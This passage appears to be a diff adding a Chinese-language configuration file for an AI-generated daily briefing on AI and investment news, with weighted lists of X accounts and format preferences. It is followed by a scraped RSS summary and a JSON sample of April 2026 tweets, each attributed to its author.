AI 工具(能快速跑通、有演示效果的优先) +- 跟上 AI 编程工具的发展(Claude Code、Cursor、Agent 相关) +- 了解顶级 VC 和行业领袖对 AI 下一步方向的判断 +- 关注 A股和美股宏观叙事的变化(尤其是科技板块) + +--- + +## 二、账号权重与偏好 + +> 权重分三档:高 / 中 / 低 +> 高权重账号:内容优先进入主题卡片 +> 中权重账号:有足够价值时进入快速扫读 +> 低权重账号:仅在有明确高价值内容时出现 + +### AI 行业 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @karpathy | Andrej Karpathy | 高 | 技术深度、可操作项目、AI编程实践 | 质量极高,几乎每条都值得看 | +| @sama | Sam Altman | 高 | 行业方向、产品发布 | 信息密度高,观点有参考价值 | +| @DarioAmodei | Dario Amodei | 高 | Anthropic动向、AI安全与能力 | Anthropic CEO,和Claude直接相关,新增 | +| @AravSrinivas | Aravind Srinivas | 高 | AI产品方向、搜索与Agent | Perplexity CEO,活跃度高,新增 | +| @AndrewYNg | Andrew Ng | 高 | 学习资源、AI教育、应用落地 | 对理解AI应用场景有帮助 | +| @ylecun | Yann LeCun | 中 | 研究方向、学术争论 | 偶尔有深度洞见,但争论性内容较多 | +| @JeffDean | Jeff Dean | 中 | 研究进展、Google AI动向 | 更新频率低,但含金量高 | +| @soumithchintala | Soumith Chintala | 中 | 开源框架、技术工具 | PyTorch相关,关注技术底层 | +| @gregbrockman | Greg Brockman | 中 | OpenAI产品动向 | 更新较少,有则关注 | +| @GaryMarcus | Gary Marcus | 低 | AI批评与反思 | 有参考价值但以质疑为主,权重偏低 | +| @elonmusk | Elon Musk | 低 | 偶尔有AI/科技相关 | 噪音多,仅关注有实质内容的推文 | + +### VC / 投资人 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @paulg | Paul Graham | 高 | 创业思维、长文洞见 | 更新少但质量极高,每条都值得读 | +| @naval | Naval Ravikant | 高 | 思维框架、财富哲学 | 更新不频繁,但思想密度高 | +| @pmarca | Marc Andreessen | 高 | AI/科技政策、VC判断、行业叙事 | a16z联合创始人,极其活跃,2.1M粉,新增替换@lmsqueegie | +| @david_tiantian | David Tian Wang | 中 | 宏观分析、市场判断 | 原@david__tian(handle有误,已修正);账号实际发帖量约42条,活跃度一般 | +| @morganhousel | Morgan Housel | 中 | 投资心理、长期主义、行为金融 | 《Psychology of Money》作者,思想密度高,新增 | +| @eladgil | Elad Gil | 中 | AI投资趋势、公司判断 | 偶有高质量行业洞见 | +| @DavidSacks | David Sacks | 中 | 科技政策、VC视角 | 观点有时偏政治,筛选后看 | +| @HarryStebbings | Harry Stebbings | 低 | VC动态 | 内容较泛,权重低 | +| @jason | Jason Calacanis | 低 | 创业生态 | 噪音较多 | + +### 宏观与交易 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @charliebilello | Charlie Bilello | 高 | 宏观数据图表、资产类别轮动 | 每天发图表分析,数据驱动,新增;贴近A股/美股宏观叙事主线 | +| @WarriorTrading | Warrior Trading | 低 | 日内交易技术 | 偏教育/营销内容,仅保留;TradingGods/ProfTrading已移除(账号无法验证) | +| @CryptoCred | Credible Crypto | 低 | 加密趋势分析 | 加密相关,权重偏低 | +| @AltcoinBuzz | AltcoinBuzz | 低 | 币圈媒体 | 偏媒体性质,优先级低 | + +### 华语圈 + +> ⚠️ 注意:中文账号名的 X handle 无法被 Nitter RSS 正常抓取。以下账号需通过 X API 或手动采集。 + +| 账号 | 名称 | 当前权重 | 偏好内容类型 | 备注 | +|------|------|----------|--------------|------| +| @二级炒家 | 二级炒家 | 高 | A股宏观、市场判断 | 和投资主线直接相关;⚠️ 中文handle,需X API | +| @svwang1 | 王川(硅谷) | 高 | 科技投资观察、深度思考 | 原@王川(已修正英文handle为@svwang1);质量高 | +| @liuliu | 刘进 | 中 | VC投资、华语科技圈 | 英文handle,Nitter可用 | + +--- + +## 三、内容类型偏好 + +### ✅ 优先展示 +- **可操作的项目/工具**:有 GitHub 链接、可以立刻尝试的内容 +- **AI 编程实践**:提示词技巧、Agent 搭建、工作流分享 +- **行业方向判断**:顶级 VC 或创始人对未来的预测和押注 +- **宏观与投资叙事**:A股、美股科技板块的结构性变化 +- **中文圈独特视角**:英文圈没有的本地化洞见 + +### ❌ 降低优先级 +- 纯政治观点(和 AI/投资无关的) +- 加密货币炒作、价格预测类 +- 互相转发的无实质内容互动 +- 重复已知信息的科普 + +--- + +## 四、简报格式偏好 + +``` +📰 AI & 投资日报 · [日期] + +【30秒总览】一句话概括今日主旋律 + +━━━━━━━━━━━━━ +🔥 今日主题卡片(2~3个) +每张卡片包含: + - 主题标签 + - 核心洞见(1~2句) + - 来源账号 + - 你可以做什么(可操作建议) + +━━━━━━━━━━━━━ +⚡ 快速扫读(剩余有价值内容) + +━━━━━━━━━━━━━ +🀄 华语圈单独板块 + +━━━━━━━━━━━━━ +📌 本期可以跟着做的事 + +━━━━━━━━━━━━━ +😴 今日无新内容的账号 +``` + +**语言**:中文总结为主,保留有分量的英文原句 +**长度**:10分钟内可以读完 +**主题卡片数量**:每日 2~3 个,宁缺毋滥 + +--- + +## 五、行为日志 +> 由 Claude 根据你的互动自动追加。记录有意义的偏好信号,作为未来权重调整的依据。 + +| 日期 | 行为 | 内容摘要 | 影响 | +|------|------|----------|------| +| 2026-04-26 | 初始配置建立 | 人工设定初始权重 | — | +| 2026-04-28 | 账号列表核查优化 | Web搜索核查全部33个账号的真实性与活跃度 | 见变更日志 | + +--- + +## 六、待解决的遗留问题 +> 系统尚未实现的功能,记录在此,后续迭代时参考。 + +- [ ] 账号内容类型自动分类(通用知识型 vs 项目介绍型),不同类型反馈权重不同 +- [ ] 点踩行为如何自动写回本文件并影响下次抓取权重 +- [ ] 新账号发现与加入机制(何时、如何引入新的关注对象) +- [ ] 账号沉默超过 N 天自动降权的规则实现 + +上下文(摘要): +# X平台关注列表推文汇总 + +**生成日期**: 2026-04-27T17:01:00.335819+00:00 +**数据来源**: Nitter RSS 订阅 +**时间范围**: 最近7天 +**账号总数**: 27 | **成功获取**: 21 | **推文总数**: 259 + +--- + +### ✅ @karpathy — Andrej Karpathy(1 条) + +**[2026-04-22T16:00:05+00:00]** +> RT by @karpathy: Imagine every pixel on your screen, streamed live directly from a model. No HTML, no layout engine, no code. Just exactly what you want to see. @eddiejiao_obj, @drewocarr and I built… +[原文链接](https://x.com/karpathy/status/2046982383430496444) + +--- + +### ✅ @sama — Sam Altman(20 条) + +**[2026-04-27T13:24:26+00:00]** +> we have updated our partnership with microsoft. microsoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds. will continue to pr… +[原文链接](https://x.com/sama/status/2048755148361707946) + +**[2026-04-27T13:09:30+00:00]** +> this is so good: https://paulgraham.com/kids.html +[原文链接](https://x.com/sama/status/2048751392031203544) + +**[2026-04-27T00:05:31+00:00]** +> so fun to see the reception to 5.5! there is almost nothing that feels more gratifying to me than builders saying they find our tools useful. +[原文链接](https://x.com/sama/status/2048554097985593849) + +**[2026-04-26T23:59:53+00:00]** +> Our Principles: Democratization, Empowerment, Universal Prosperity, Resilience, and Adaptability https://openai.com/index/our-principles/ +[原文链接](https://x.com/sama/status/2048552677433643427) + +**[2026-04-26T15:46:41+00:00]** +> feels like a good time to seriously rethink how operating systems and user interfaces are designed (also the internet; there should be a protocol that is equally usable by people and agents) +[原文链接](https://x.com/sama/status/2048428561481265539) + +**[2026-04-26T15:37:00+00:00]** +> "post-AGI, no one is going to work and the economy is going to collapse" "i am switching to polyphasic sleep because GPT-5.5 in codex is so good that i can't afford to be sleeping for such long stret… +[原文链接](https://x.com/sama/status/2048426122854228141) + +**[2026-04-26T02:15:19+00:00]** +> RT by @sama: That's exactly my view too, roughly compresses 2 weeks of our previous jobs to 1 day +[原文链接](https://x.com/sama/status/2048224374264885396) + +**[2026-04-25T22:20:08+00:00]** +> how can they write code so fast?! +[原文链接](https://x.com/sama/status/2048165186482389253) + +**[2026-04-25T22:01:18+00:00]** +> R to @sama: (and we will fix the former) +[原文链接](https://x.com/sama/status/2048160448340767038) + +**[2026-04-25T22:01:08+00:00]** +> we still get looksmaxxed on frontend a little but we IQmog hard now +[原文链接](https://x.com/sama/status/2048160404376105179) + +**[2026-04-25T15:31:08+00:00]** +> 5.5 is so earnest "little engine that could" energy +[原文链接](https://x.com/sama/status/2048062261584077149) + +**[2026-04-24T23:41:49+00:00]** +> this was a good week. proud of the team. happy building! +[原文链接](https://x.com/sama/status/2047823357635354814) + +**[2026-04-24T21:17:51+00:00]** +> GPT-5.5 and GPT-5.5 Pro are now available in the API! +[原文链接](https://x.com/sama/status/2047787124846653895) + +**[2026-04-24T14:27:13+00:00]** +> 🫶 +[原文链接](https://x.com/sama/status/2047683787828703289) + +**[2026-04-24T00:33:16+00:00]** +> RT by @sama: Today we open sourced many of OpenAI's monitorability evaluations. We hope that the research community and other model developers can build upon them and use them to evaluate the monitor… +[原文链接](https://x.com/sama/status/2047473914528563592) + +**[2026-04-23T19:54:32+00:00]** +> "don't retweet this, don't retweet this, don't retweet this..." ah fuck it, life imitates art. +[原文链接](https://x.com/sama/status/2047403771416940715) + +**[2026-04-23T19:21:55+00:00]** +> We tried a new thing with NVIDIA to roll out Codex across a whole company and it was awesome to see it work. Let us know if you'd like to do it at your company! +[原文链接](https://x.com/sama/status/2047395562501411058) + +**[2026-04-23T19:09:11+00:00]** +> embers +[原文链接](https://x.com/sama/status/2047392357482639749) + +**[2026-04-23T18:47:43+00:00]** +> RT by @sama: there are early signs of 5.5 being a competent ai research partner. several researchers let 5.5 run variations of experiments overnight given only a high level algorithmic idea, wake up … +[原文链接](https://x.com/sama/status/2047386955550470245) + +**[2026-04-23T18:26:18+00:00]** +> RT by @sama: New in the Codex app: - GPT-5.5 - Browser control - Sheets & Slides - Docs & PDFs - OS-wide dictation - Auto-review mode Enjoy! +[原文链接](https://x.com/sama/status/2047381565534322694) + +--- + +### ✅ @DarioAmodei — Dario Amodei(0 条) + +--- + +### ✅ @AravSrinivas — Aravind Srinivas(10 条) + +**[2026-04-24T21:24:24+00:00]** +> You would consume less computer credits (and be able to run more tasks as a result) if you switched to GPT-5.5 as your default orchestrator. This was the number one complaint about Computer (being cr… +[原文链接](https://x.com/AravSrinivas/status/2047788775468908840) + +**[2026-04-24T19:03:21+00:00]** +> We’re rolling out GPT 5.5 as the default orchestrator model for Perplexity Computer. We will be monitoring the user sentiment compared to Opus 4.7 as the default as the rollout expands. Let us know y… +[原文链接](https://x.com/AravSrinivas/status/2047753276888854595) + +**[2026-04-24T18:44:19+00:00]** +> RT by @AravSrinivas: GPT-5.5 is now available on Perplexity for Max subscribers. GPT-5.5 is also rolling out as the default orchestration model in Computer for both Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047748486767272243) + +**[2026-04-23T02:46:57+00:00]** +> RT by @AravSrinivas: Kimi K2.6, the new state-of-the-art open-weight model from Moonshot, is now available for Pro and Max subscribers. +[原文链接](https://x.com/AravSrinivas/status/2047145172337836139) + +**[2026-04-22T18:28:20+00:00]** +> We’ve post trained a model on top of Qwen that achieves Pareto optimality on accuracy-cost curves. Unlike our previous post trained models, this model has been trained to be good at search and tool c… +[原文链接](https://x.com/AravSrinivas/status/2047019688920756504) + +**[2026-04-22T18:15:16+00:00]** +> RT by @AravSrinivas: We've published new research on how we post-train models for accurate search-augmented answers. Our SFT + RL pipeline improves search, citation quality, instruction following, an… +[原文链接](https://x.com/AravSrinivas/status/2047016400292839808) + +**[2026-04-21T17:14:42+00:00]** +> As agentic workloads expand, the best orchestration hybridizes centralized servers and CPUs for the ultimate continuity. Especially when you want your AI to use your local apps and messages. +[原文链接](https://x.com/AravSrinivas/status/2046638770162995603) + +**[2026-04-21T15:06:26+00:00]** +> ⌘ ⌘ +[原文链接](https://x.com/AravSrinivas/status/2046606492649091212) + +**[2026-04-21T02:43:37+00:00]** +> RT by @AravSrinivas: Whoa 🤯 +[原文链接](https://x.com/AravSrinivas/status/2046419556424675677) + +**[2026-04-20T21:57:10+00:00]** +>  +[原文链接](https://x.com/AravSrinivas/status/2046347469488107839) + +--- + +### ✅ @AndrewYNg — Andrew Ng(1 条) + +**[2026-04-27T15:58:13+00:00]** +> AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to… +[原文链接](https://x.com/AndrewYNg/status/2048793852702757151) + +--- + +### ✅ @ylecun — Yann LeCun(19 条) + +**[2026-04-26T18:31:11+00:00]** +> RT by @ylecun: Republicans have been making this argument my entire life. We had 8 years of Clinton, 8 years of Obama, 4 years of Biden— never became a socialism. But you know what we got? More jobs,… +[原文链接](https://x.com/ylecun/status/2048469956627468510) + +**[2026-04-26T17:27:23+00:00]** +> RT by @ylecun: Trump just fired all 24 members of the National Science Board. Every single one. By email. No warning. No reason given. The board has existed since 1950. The National Science Board is … +[原文链接](https://x.com/ylecun/status/2048453901930660058) + +**[2026-04-26T16:03:04+00:00]** +> RT by @ylecun: Existential risk mongers are a small, very vocal cult with a lot of very clever online astroturfing skills. Politicians never waste a good fake crisis, which is why they're perfect for… +[原文链接](https://x.com/ylecun/status/2048432684930654430) + +**[2026-04-26T13:51:41+00:00]** +> Shooting oneself in the foot? Nope. Shooting oneself in the prefrontal cortex. +[原文链接](https://x.com/ylecun/status/2048399621492236615) + +**[2026-04-26T06:48:29+00:00]** +> RT by @ylecun: Never let critical thinking get in the way of extremist fantasy stories. If you're on either side of this slider, congratulations, you may be a child in an adult costume body! Black an… +[原文链接](https://x.com/ylecun/status/2048293118781296734) + +**[2026-04-25T19:15:22+00:00]** +> RT by @ylecun: OPINION: "Trump’s mismanagement has resulted in death, destruction, wasted tax dollars, and a huge loss in respect for the United States — all to accomplish nothing." https://ebx.sh/V5… +[原文链接](https://x.com/ylecun/status/2048118689258487857) + +**[2026-04-25T16:01:07+00:00]** +> RT by @ylecun: When MTV News shut down, it felt like decades of culture vanished overnight 🕳️ But over 470,000 pages were already preserved. That history didn’t disappear. It was archived. 📚 Read VAN… +[原文链接](https://x.com/ylecun/status/2048069805807128734) + +**[2026-04-24T20:50:37+00:00]** +> RT by @ylecun: Number of people who go bankrupt every year because of medical bills or illness-related work loss: 🇦🇺 0 🇨🇦 0 🇩🇰 0 🇫🇮 0 🇫🇷 0 🇩🇪 0 🇮🇸 0 🇮🇪 0 🇮🇹 0 🇯🇵 0 🇳🇱 0 🇳🇴 0 🇵🇹 0 🇪🇸 0 🇸🇪 0 🇬🇧 0 🇺🇸 53… +[原文链接](https://x.com/ylecun/status/2047780272297382384) + +**[2026-04-24T19:31:52+00:00]** +> RT by @ylecun: New episode of The Information Bottleneck is out, this time with @liuzhuang1234 (Princeton). We talked about ConvNeXt and whether architecture still matters; dataset bias and what "goo… +[原文链接](https://x.com/ylecun/status/2047760455679246500) + +**[2026-04-24T17:45:08+00:00]** +> RT by @ylecun: The web is disappearing 🕳️ According to a Pew Research Center report, 26% of pages from 2013-2023 are no longer accessible. But that’s not the whole story. In a new study published in … +[原文链接](https://x.com/ylecun/status/2047733594064408894) + +**[2026-04-24T15:23:18+00:00]** +> RT by @ylecun: 图灵奖获得者、 AI 三大教父之一的 LeCun在达沃斯的发言,算是把整个硅谷的遮羞布扯了。 他说现在整个行业都被LLM彻底洗脑了,所有人都在同一条赛道上互相挖人,谁敢偏离主流谁就被骂落后。 这也是他离开Meta的真正原因,连Meta都已经LLM-pilled,他不想再跟风了。 最扎心的一句话是:纯生成式架构,不管是LLM、VLM还是VLA,永远造不出哪怕猫级的智能… +[原文链接](https://x.com/ylecun/status/2047697898989572176) + +**[2026-04-24T14:14:06+00:00]** +> RT by @ylecun: A mathematician who shared an office with Claude Shannon at Bell Labs gave one lecture in 1986 that explains why some people win Nobel Prizes and other equally smart people spend their… +[原文链接](https://x.com/ylecun/status/2047680485208531152) + +**[2026-04-24T13:58:49+00:00]** +> RT by @ylecun: Feel like very few serious people make the argument Britain should develop its own LLM? Certainly not an argument you see made in Westminster often during the sovereignty debate. Also … +[原文链接](https://x.com/ylecun/status/2047676640059154653) + +**[2026-04-24T11:19:36+00:00]** +> RT by @ylecun: 1. I never said LLMs were not useful. They are, particularly with all the bells and whistles that are being added to them. I use them. 2. A robot-rich future can't be built with AIs th… +[原文链接](https://x.com/ylecun/status/2047636569767419951) + +**[2026-04-24T10:30:09+00:00]** +> RT by @ylecun: 🎓 Register now for ML & Advanced Stats Summer School, an intensive set of courses on theoretical foundations & applications of ML methods & modern stats analysis techniques. With @ELLI… +[原文链接](https://x.com/ylecun/status/2047624126047670758) + +**[2026-04-24T06:38:08+00:00]** +> RT by @ylecun: 🔴 Trump vient de publier sur Truth Social un monologue de 1 500 mots sur le droit du sol, l'ACLU, les Indiens, les Chinois et la "Savage Nation". Ce texte inhabituellement long, inhabi… +[原文链接](https://x.com/ylecun/status/2047565736382534091) + +**[2026-04-23T23:15:06+00:00]** +> RT by @ylecun: Trump completely passed out, reawakened, then passed out again during today's pressor in the Oval Office. 😂🤣👇 +[原文链接](https://x.com/ylecun/status/2047454244781818205) + +**[202 + +推文样本(JSON): +[{"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:54:21+00:00", "title": "Calling him “Scam” Altman is accurate. \n\nThis is very much worth reading.", "url": "https://x.com/elonmusk/status/2048807976991850953"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:39:59+00:00", "title": "RT by @elonmusk: Sam Altman cannot be trusted.\n\n• The OpenAI board fired him because he was not always honest with them. They said he should not control powerful AI.\n\n• A major report talked to over 100 people and saw secret papers. It says he has almost a sociopathic lack of con", "url": "https://x.com/elonmusk/status/2048804363595059425"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:31:33+00:00", "title": "Exactly", "url": "https://x.com/elonmusk/status/2048802239272169582"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:30:27+00:00", "title": "Pinned: Scam Altman and Greg Stockman stole a charity. Full stop. \n\nGreg got tens of billions of stock for himself and Scam got dozens of OpenAI side deals with a piece of the action for himself, Y Combinator style. After this lawsuit, Scam will also be awarded tens of billions i", "url": "https://x.com/elonmusk/status/2048801964457140540"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T16:21:30+00:00", "title": "Scam Altman", "url": "https://x.com/elonmusk/status/2048799712375902624"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T16:21:01+00:00", "title": "Americans spent over $109 billion on lottery tickets last year, which is more than they spent on movies, books, concerts and sports tickets - combined.", "url": "https://x.com/charliebilello/status/2048799590044852390"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:13:00+00:00", "title": "Imagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 \n\nFrom hill country ranches to Austin in ten minutes?! \n\nIf you could buy one for $2m, or lease for $5k a month, and commute into a city from the burbs?!? Wild. https://x.com/shaig/st", "url": "https://x.com/jason/status/2048797572014207114"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T16:10:40+00:00", "title": "10 minutes from manhattan to jfk is a game changer… \n\n… but the 5 minutes from my loft in Chelsea to Breezy Point in 7 minutes during the 90s would have been insane! \n\nImagine when you can take these on Uber (or own one), what it will do to real estate values?!? 🤯 https://x.com/", "url": "https://x.com/jason/status/2048796982227972344"}, {"handle": "AndrewYNg", "name": "Andrew Ng", "published_at": "2026-04-27T15:58:13+00:00", "title": "AI-native software engineering teams operate very differently than traditional teams. The obvious difference is that AI-native teams use coding agents to build products much faster, but this leads to many other changes in how we operate. For example, some great engineers now play", "url": "https://x.com/AndrewYNg/status/2048793852702757151"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:56:52+00:00", "title": "RT by @elonmusk: From space to your phone, Starlink Mobile is now available to deliver data, voice, video, and messaging to @docomo customers in Japan 🛰️❤️📱", "url": "https://x.com/elonmusk/status/2048793511701717143"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:56:20+00:00", "title": "RT by @Jason: update! the @twistartups AI sidebar is going well\n\nThe goal: a live AI sidebar with 4 personas watching the pod in real time\n\nProgress update: \n✅ Side bar (Chrome extension works with any website)\n✅ Two characters: comedian fox + troll alien\n✅ Ability to adjust freq", "url": "https://x.com/jason/status/2048793378511536538"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:50:31+00:00", "title": "If a major car company had AI fan boys and released a car with loose lug nuts and the wheels came off, after hyping it as the greatest thing ever, and a bunch of people died, those fan boys would say “y’all shoulda known”.", "url": "https://x.com/GaryMarcus/status/2048791912149295182"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:33:34+00:00", "title": "R to @GaryMarcus: that said, another tweet by the same user does correctly assess what’s wrong with most user’s model of what LLMs say.", "url": "https://x.com/GaryMarcus/status/2048787646206677207"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T15:31:37+00:00", "title": "This is totally wrong.\n\nBlaming the user is missing the point that (a) coding agents have been overhyped and (b) can’t reliably obey the rules given to them in system prompts and other guardrails.", "url": "https://x.com/GaryMarcus/status/2048787157536653627"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:26:33+00:00", "title": "RT by @elonmusk: .@shaunmmaguire says Elon Musk’s X acquisition was in service of civilizational-scale missions.\n\n\"I truly believe, like in my soul, that he is trying to help humanity.\"\n\n\"He has these goals. Like back up the biosphere by making us a multi-planetary species or ush", "url": "https://x.com/elonmusk/status/2048785882950549854"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T15:15:09+00:00", "title": "If extremely violent criminals are not imprisoned, eventually they will murder innocent people", "url": "https://x.com/elonmusk/status/2048783014075777369"}, {"handle": "jason", "name": "Jason Calacanis", "published_at": "2026-04-27T15:03:32+00:00", "title": "Best accounts for following Austin air quality? @grok", "url": "https://x.com/jason/status/2048780089295302690"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T14:53:45+00:00", "title": "Excellent point", "url": "https://x.com/elonmusk/status/2048777628019032335"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T14:27:36+00:00", "title": "yep, that’s what I do. \n\nI am increasingly concerned that people in China are soaking up my wisdom, while a lot of people in the US try to dismiss me.\n\ni don’t think that is going to end well.", "url": "https://x.com/GaryMarcus/status/2048771044987777428"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "R to @HarryStebbings: Spotify https://open.spotify.com/episode/5KPihKzCMKY2DnPeuSxXZ5\nApple Podcasts https://podcasts.apple.com/us/podcast/20vc-applovin-%24160bn-market-cap-%245-48bn-revenue-%2410m/id958230465?i=1000763769440\nYoutube https://youtu.be/dlPCz8Jwypw", "url": "https://x.com/HarryStebbings/status/2048764743205134644"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T14:02:33+00:00", "title": "Adam Foroughi is by far one of the best CEOs I have ever interviewed.\n\nCandidly he is insanely stern and cold but also obsessive, focused and utterly brilliant.\n\nWith Adam there is zero fluff, like none. He says what he means and means what he says.\n\nApplovin does $10M EBITDA per", "url": "https://x.com/HarryStebbings/status/2048764741435179442"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:50:42+00:00", "title": "2026 is following the same playbook as 2025. Only difference is traders have become much more immune to extreme rhetoric and have been more confident in buying the dip, sending the stock market quickly back to new all-time highs. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0T", "url": "https://x.com/charliebilello/status/2048761760971096534"}, {"handle": "JeffDean", "name": "Jeff Dean", "published_at": "2026-04-27T13:40:08+00:00", "title": "The video of my conversation with Amin Vahdat, @gilbert, and @djrosent at Cloud Next last week is now up. \n\nhttps://youtu.be/BpnJYJmbXcM?si=vUY3hI_aDX8K6gco\n\nThanks for a great conversation!", "url": "https://x.com/JeffDean/status/2048759102390899142"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T13:32:43+00:00", "title": "⚠️ AI agents are wildly premature technology that is being rolled out way too fast. The deepest lesson about the vibe coded AI agent disaster story that is running around is NOT about losing your data. ⚠️\n\n𝗜𝘁’𝘀 𝗮𝗯𝗼𝘂𝘁 𝗔𝗜 𝘀𝗮𝗳𝗲𝘁𝘆. \n\nThe user wasn’t (totally) naive. He thought system", "url": "https://x.com/GaryMarcus/status/2048757233174122827"}, {"handle": "HarryStebbings", "name": "Harry Stebbings", "published_at": "2026-04-27T13:30:16+00:00", "title": "Two areas I would love to invest that are non-technical: \n\n1. Egg freezing clinics. In 10 years, strongly believe every 21 year old will freeze their eggs and it becomes the norm. \n\nAmazing business. Insane retention numbers. Super high margin. \n\n2. AI re-skilling facilities. Go ", "url": "https://x.com/HarryStebbings/status/2048756619622707452"}, {"handle": "soumithchintala", "name": "Soumith Chintala", "published_at": "2026-04-27T13:29:14+00:00", "title": "This is kinda interesting.\n\nAnthro probably needs to scale up Account Support via Claude or via humans (traditional account managers). Would be funny if they chose humans.\n\nAlternatively, more and more companies can probably go multi-AI with open harnesses. \n\nSimilar problems to ", "url": "https://x.com/soumithchintala/status/2048756358820827564"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:24:26+00:00", "title": "we have updated our partnership with microsoft.\n\nmicrosoft will remain our primary cloud partner, but we are now able to make our products and services available across all clouds.\n\nwill continue to provide them with models and products until 2032, and a revenue share through 203", "url": "https://x.com/sama/status/2048755148361707946"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:16:36+00:00", "title": "The S&P 500's CAPE Ratio has moved up to 41, its highest level since 2000 and now above 99% of historical valuations. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=36s", "url": "https://x.com/charliebilello/status/2048753179471323584"}, {"handle": "sama", "name": "Sam Altman", "published_at": "2026-04-27T13:09:30+00:00", "title": "this is so good:\n\nhttps://paulgraham.com/kids.html", "url": "https://x.com/sama/status/2048751392031203544"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T13:08:19+00:00", "title": "With 28% of companies reported, S&P 500 1st quarter earnings are up 15% over the prior year, the 13th consecutive quarter of positive YoY growth. $SPX\n\nVideo: https://www.youtube.com/watch?v=p5e0ThPjIAg&t=973s", "url": "https://x.com/charliebilello/status/2048751094671585397"}, {"handle": "charliebilello", "name": "Charlie Bilello", "published_at": "2026-04-27T12:53:00+00:00", "title": "RT by @charliebilello: Wondering which month is the best time to start investing?\nThe right answer is any month. Just start!", "url": "https://x.com/charliebilello/status/2048747238986305979"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:50:55+00:00", "title": "RT by @elonmusk: Today marks the start of the Elon Musk v.Sam Altman trial.\n\nTwo opposing worldviews. \nSam Altman transformed a non-profit organization into one of the world's most profitable companies for his own enrichment.\n\n Elon Musk, who did everything he could to limit the", "url": "https://x.com/elonmusk/status/2048746715805581608"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:48:41+00:00", "title": "R to @GaryMarcus: Stop blaming the users. It’s not that simple:", "url": "https://x.com/GaryMarcus/status/2048746152749846549"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T12:40:59+00:00", "title": "RT by @elonmusk: 🚨 NEWS: Emirates upgrades its iconic A380 with Starlink high-speed Wi-Fi, delivering “better-than-home” internet at 40,000 feet.\n\n• Up to 3 Starlink antennas on each A380 for massive speed boost\n\n• Internet performance improved up to 1000x vs older systems\n\n• Ena", "url": "https://x.com/elonmusk/status/2048744214230712500"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:36:05+00:00", "title": "People keep blaming the users for the growing number of vibe-coded reasoners. Doing so is *half* right.\n\nUsers *are*screwing up - by letting vibe coded stuff access their files, without proper backups, without proper monitoring, without adequate sysadmin, etc.\n\nBut that’s *exactl", "url": "https://x.com/GaryMarcus/status/2048742983684784239"}, {"handle": "GaryMarcus", "name": "Gary Marcus", "published_at": "2026-04-27T12:20:17+00:00", "title": "“Vibe coded disasters piling up on Reddit”", "url": "https://x.com/GaryMarcus/status/2048739005525877072"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:35:33+00:00", "title": "RT by @elonmusk: This is the 7th consecutive week with new reporting that ChatGPT was used in connection with murder or suicide. \n\nOpenAI doesn’t “benefit all of humanity.”", "url": "https://x.com/elonmusk/status/2048727747954868342"}, {"handle": "elonmusk", "name": "Elon Musk", "published_at": "2026-04-27T11:08:22+00:00", "title": "RT by @elonmusk: They arrested the President of the United States of America 4X, charged him 91X, indicted him 4X, spied on his campaign, sabotaged his first term, jailed his supporters, raided his private residence, censored him, gagged him, tried to bankrupt him, and attempted ", "url": "https://x.com/elonmusk/status/2048720909809156378"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T10:01:28+00:00", "title": "One of my favorite pictures. A guy I didn't know took it of us on a street in Palo Alto about 10 years ago.", "url": "https://x.com/paulg/status/2048704073356935676"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T09:50:40+00:00", "title": "You never need to describe something as a \"bad take.\" If it's false or irrelevant or omits something important, you can just say so. And if it's true, relevant, and complete, it's not a bad take.", "url": "https://x.com/paulg/status/2048701354672050286"}, {"handle": "paulg", "name": "Paul Graham", "published_at": "2026-04-27T08:17:48+00:00", "title": "Worrying that your startup will be eaten by the model companies is like worrying that your life will be constrained after you become a 